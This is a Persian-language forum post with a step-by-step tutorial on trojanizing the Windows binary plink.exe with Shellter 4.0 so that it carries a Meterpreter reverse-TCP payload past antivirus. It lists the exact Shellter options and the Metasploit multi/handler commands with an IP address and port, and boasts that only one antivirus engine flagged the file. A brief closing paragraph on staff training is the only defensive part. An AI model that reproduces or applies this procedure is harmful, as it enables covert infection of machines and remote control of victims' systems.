SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

بایپس کردن آنتی ویروس با استفاده از Shellter 4.0 در کالی لینوکس

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • بایپس کردن آنتی ویروس با استفاده از Shellter 4.0 در کالی لینوکس

    [align=right]با سلام!
    آیا شما هم جزو اون دسته از افرادی هستین که با گرفتن شل Meterpreter با وجود یک آنتی ویروس مزاحم مشکل دارید؟
    پیشنهاد میکنم حتما این مقاله رو دنبال کنید و با ابزار Shellter 4.0 آشنا بشین!

    آخرین ورژن از Shellter برای انجام تست نفوذ که در گذشته به صورت زیرزمینی بوده در این این ماه به صورت عمومی منتشر شده.
    آپدیت جدید آن شامل روش های مبهم سازی از طریق یک رمزگذاری سفارشی و دیکد کردن به شکل چند ریختی است.
    هیچنین این نسخه از نرم افزار راه رو برای ایجاد شل های Meterpreter عمومی آسانتر کرده.
    Shellter از طریق یک فایل مجاز ویندوزی .exe اجرا خواهد شد به این صورت که شل کد را به آن فایل اجرایی اضافه میکند و از طریق یک راه عالی شروع به دستکاری فایل میکند که از دید آنتی ویروس ها در امان باشد. حالت خودکار نرم افزار کل این مراحل سخت بالا را بدون دردسر انجام میدهد. در این آموزش من از یک ویندوز 7 و کالی لینوکس در ماشین مجازی استفاده کردم.
    خوب حرف زدن کافیه بریم در عمل ببینمیش!

    1- دانلود و نصب Shellter ( https://www.shellterproject.com/download/ )

    نکته:ورژن جدید کالی نسخه بروز شلتر را بروزرسانی نکرده و شما باید پس از دانلود فایل زیپ ان را در مسیر /etc/share استخراج کنید!

    2- فایل "plink.exe" رو از سیستم کالی مسیر 'usr/share/windows-binaries' بردارید و در فولدر Shellter بریزید.

    3- Shellter را اجرا کنید - 'shellter' از طریق ترمینال یا استفاده از 'wineconsole shellter' از '/etc/share/shellter' اگر شما به صورتی دستی نرم افزار را نصب کرده اید.


    4- حرف 'A' را برای مود خودکار فشار دهد.

    5- در هنگام سوال برای فایل PE مقدار 'plink.exe' را وارد کنید.

    6- هنگامی که نرم افزار از شما درخواست پیلود مورد نظر را کرد ابتدا 'L' و سپس "1" را بزند.



    7- بعد،ای پی سیستم کالی لنوکس خود را وارد کنید (برای من هست 192.168.1.39)

    8- و پورتی که میخواهید استفاده کنید(من از 5555 استفاده کردم)



    Shellter شروع به مبهم سازی کد و برای مدتی خواهد کرد، بعد از انجام کار شما باید تصاویر زیر را ببینیند:



    در این هنگام شما موفق به ساخت فایل آلوده شدید!

    9- حال ما نیاز به اجرای یک سرویس شنونده در سیستم کالی خود با استفاده از تنظیمات بالا داریم:

    • start Metasploit (‘msfconsole’ in a terminal)
    • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set lhost 192.168.1.39
    • set lport 5555
    • exploit

    10- حال کالی منتظر دریافت یک ارتباط است. حال فایل آلوده 'plink.exe' در ویندوز 7 ماشین مجازی کپی و سپس اجرا میکنیم:

    و بعد ... ما یک دسترسی شل از سیستم هدف داریم!
     

    حال اگر اندازه فایل اصلی را با فایلی که آلوده کردیم مقایسه کنیم میبینم که دقیقا یک اندازه هستند. حال فایل آلوده را در سایت virustotal آپلود و اسکن میکنیم.
     

    یک! وفقط یک آنتی ویروس فایل مخرب را تشخیص داد و این یک آنتی ویروس معروف و قابل استفاده در کمپانی های مختلف نیست!

    راه حل پیشگیری از آلوده شدن:

    همون طور که دیدید فایل درب پشتی به راحتی توانست انتی ویروس ها را بایپس کند پس آنتی ویروس به تنهایی شما را از شر فایل های مخرب و هکر ها در امان نخواهد داشت! شما باید به کارکنان خود بیاموزید که در شبکه های اجتماعی و سایت های غیر رسمی و یا ایمیل خود فایلی را از کسی نگیرند و اجرا نکنند.

    با تشکر
    IR4N0nY[/align]
    [align=center]My Email: [email protected]
    [/align][align=left]mov problems,hell
    sub me,pain
    add me,love
    inc pleasure
    inc adrenaline
    push limits
    call hopeForAbetterTomorrow[/align]
صبر کنید ..
X